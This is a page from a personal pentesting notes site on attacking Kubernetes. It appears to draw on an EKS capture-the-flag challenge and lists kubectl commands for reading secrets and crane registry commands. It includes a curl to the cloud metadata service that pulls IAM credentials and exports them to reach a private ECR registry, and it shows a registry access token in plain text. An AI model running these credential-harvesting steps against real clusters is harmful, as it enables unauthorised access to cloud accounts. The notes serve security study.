Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Kubectl
  • Secrets
  • Crane
  • Inspect ECR (Amazon Elastic Container Registry) artifacts
  1. Cloud

Kubernetes

PreviousPivotingNextAzure

Last updated 5 months ago

, also known as K8s, is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups containers that make up an application into logical units for easy management and discovery.


Kubectl

# Find out the subject for the current context of kubeconfig
kubectl whoami

# Check whether an action is allowed.
kubectl auth can-i <action>

# List all actions that are allowed
kubectl auth can-i --list

# Get pods
kubectl get pods

# Get specific pot
kubectl get pod <name> -o yaml

Secrets

# Get secrets
kubectl get secrets

# Get secret
kubectl get secret <secret> -o yaml

Crane

# Auth to registry
crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m41lr45iYQj8FuCo

# Pull image
crane pull eksclustergames/base_ext_image /tmp/image.tar
# Get security credentials using link-local address
curl http://169.254.169.254/latest/meta-data/iam/security-credentials

# Store security creds in variable
TOKEN=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole)

# Store AWS_ACCESS_KEY_Id in env from TOKEN
export AWS_ACCESS_KEY_ID=$(echo $TOKEN | jq -r '.AccessKeyId')

# Store AWS_SECRET_ACCESS_KEY in env from TOKEN
export AWS_SECRET_ACCESS_KEY=$(echo $TOKEN | jq -r '.SecretAccessKey'

# Store AWS_SESSION_TOKEN in env from TOKEN
export AWS_SESSION_TOKEN=$(echo $TOKEN | jq -r '.SessionToken')

# Get AWS login password using env variables
aws ecr get-login-password

# Store pass in variable
PASSWORD=$(aws ecr get-login-password)

# Use crane to login
crane auth login 688625246681.dkr.ecr.us-west-1.amazonaws.com -u AWS -p $PASSWORD

# Get config and pipe to JSON
crane config 688625246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecc1c6a1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq

is a tool for managing container images.

Inspect ECR () artifacts

☁️
Crane
Amazon Elastic Container Registry
Kubernetes